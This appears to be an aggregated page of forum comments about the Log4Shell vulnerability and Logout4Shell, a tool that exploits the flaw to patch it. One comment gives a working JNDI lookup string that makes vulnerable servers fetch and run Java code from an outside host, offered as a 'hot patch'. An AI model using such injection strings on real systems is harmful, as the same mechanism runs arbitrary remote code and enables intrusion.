active-scan-plus-plus VS Logout4Shell

Rules for Burp Suite ActiveScan++

#1: RCE 0-day exploit found in log4j, a popular Java logging package | 276 comments #2: Godaddy hacked - including admin passwords for both WordPress sites hosted on the platform, as well as passwords for sFTPs, databases and SSL private keys. | 71 comments #3: Log4shell - using the vulnerability to patch the vulnerability - very clever | 64 comments

Hier gibt es eine Impfung gegen Log4Shell. Kein Witz: https://github.com/Cybereason/Logout4Shell

another option : https://github.com/Cybereason/Logout4Shell

Yup

This is actually a thing

We also wrote a Log4Shell payload that will in-memory "hot patch" your server against Log4Shell.

${jndi:ldap://hotpatch.log4shell.com:1389/a}

If you paste that into a vulnerable server (or even throw it into a log statement in your `main` function), that'll patch you against this until you can manage to update properly.

Source code is on GitHub here[0][1] if you want to host it yourself.

(This work is based on Logout4Shell[2], but we rewrote it to fix the bugs, make it work in more places, and also hosted it so that you don't have to muck with DNS and live server stuff.)

0: https://github.com/lunasec-io/lunasec/releases/

1: (Go source code) https://github.com/lunasec-io/lunasec/tree/master/tools/log4...

2: https://github.com/Cybereason/Logout4Shell

The two examples showcase the potential of the RCE. The JNDI endpoint answers with a serialized java class:

a) https://github.com/Cybereason/Logout4Shell where a class is self-healing the log4j vulnerability by reconfiguring it

b) https://twitter.com/marcioalm/status/1470361495405875200 where the payload is opening an application (calculator) on the host system

For those that are interested!